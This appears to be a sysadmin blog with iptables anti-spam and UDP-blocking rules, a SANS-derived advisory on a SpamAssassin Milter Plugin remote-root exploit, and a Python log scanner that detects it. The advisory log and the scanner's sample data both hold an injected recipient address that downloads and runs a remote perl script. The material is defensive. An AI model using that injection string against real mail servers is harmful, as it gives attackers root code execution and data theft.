How to protect your own hosting from outgoing spam

Posted by: admin  :  Category: Firewall, Security

What if you run your own hosting and your IP is permanently blacklisted?
Are your customers simply complaining?
How do you solve this problem? Here is some help!

It is enough to rate-limit sending attempts that come too often and to write those attempts to the log:

iptables -A FORWARD -p tcp -m tcp --dport 25 -m state --state NEW -m recent --update --seconds 60 --hitcount 6 --name SMTP_LOCAL --rsource -j ULOG --ulog-prefix "Spam:" --ulog-nlgroup 2 --ulog-cprange 100

Next example: protect ssh and ftp from brute-force attacks, smtp from spam and web from & ddos


How to block UDP packets on all ports except one

Posted by: admin  :  Category: Firewall, Security

This example blocks all incoming UDP packets except those to port 27005:

iptables -A INPUT -p udp --dport 27005 -j ACCEPT
iptables -A INPUT -p udp -i lo -j ACCEPT # You may omit this rule
iptables -A INPUT -p udp -s 0/0 -j DROP

Spamassassin Milter Plugin Remote Root Attack

Posted by: admin  :  Category: Security

Observant reader Roy caught an interesting attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
table; from=<blue@attacker.com> to=<root+:|wget
hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears the bad guys have started to actively exploit the SpamAssassin Milter Plugin vulnerability that was published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 — this host appears to be unreachable at the moment though.

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136

Alternatively, don’t use the -x option when running this plugin, and do not run it as root.

http://isc.sans.org/diary.html?storyid=8434
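
A log check for the kind of recipient Roy found, added here as an example (it is not code from the original post or from the SANS diary): it scans Postfix-style reject lines for RCPT addresses that contain shell metacharacters and reports the connecting client. The sample log lines, the addresses in them and all names in the code are constructed for illustration.

```python
import re
from collections import namedtuple

Hit = namedtuple("Hit", "client_ip sender recipient")

# Pipe, semicolon, backtick, "$(" or whitespace inside a recipient. A few of
# these are legal in an RFC 5321 local part but practically never appear in
# real mail, so a match is worth an analyst's attention.
SHELL_META = re.compile(r"[|;`\s]|\$\(")

CLIENT = re.compile(r"RCPT from \S*?\[([^\]]+)\]")
SENDER = re.compile(r"\bfrom=<([^>]*)>")
# The recipient may contain spaces and even '>', so read up to the '>' that
# is followed by the next key=value field or by the end of the line.
RECIPIENT = re.compile(r"\bto=<(.*?)>(?=\s+\w+=|\s*$)")

# Constructed sample lines in Postfix smtpd format (assumed log layout).
SAMPLE_LOG = [
    "Mar 12 04:10:01 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[192.0.2.10]: 550 5.1.1 <root+:|wget hxxp://example.invalid/p.txt;perl p.txt>: Recipient address rejected: User unknown in local recipient table; from=<blue@example.invalid> to=<root+:|wget hxxp://example.invalid/p.txt;perl p.txt> proto=SMTP helo=<example.invalid>",
    "Mar 12 04:11:30 mx postfix/smtpd[2105]: NOQUEUE: reject: RCPT from mail.example.org[198.51.100.7]: 550 5.1.1 <bob@target.example>: Recipient address rejected: User unknown in local recipient table; from=<alice@example.org> to=<bob@target.example> proto=ESMTP helo=<mail.example.org>",
    "Mar 12 04:12:02 mx postfix/smtpd[2107]: connect from mail.example.org[198.51.100.7]",
]


def suspicious_recipients(lines):
    """Return a Hit for every log line whose RCPT address looks like a shell command."""
    hits = []
    for line in lines:
        rcpt = RECIPIENT.search(line)
        if not rcpt or not SHELL_META.search(rcpt.group(1)):
            continue
        client = CLIENT.search(line)
        sender = SENDER.search(line)
        hits.append(Hit(
            client.group(1) if client else "?",
            sender.group(1) if sender else "?",
            rcpt.group(1),
        ))
    return hits


if __name__ == "__main__":
    for hit in suspicious_recipients(SAMPLE_LOG):
        print(f"{hit.client_ip}  from=<{hit.sender}>  to=<{hit.recipient}>")
```

A hit on a server that runs the milter with -x or as root is a reason to check the patch status from the mitigation above; the client addresses it reports can also feed a firewall block list.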
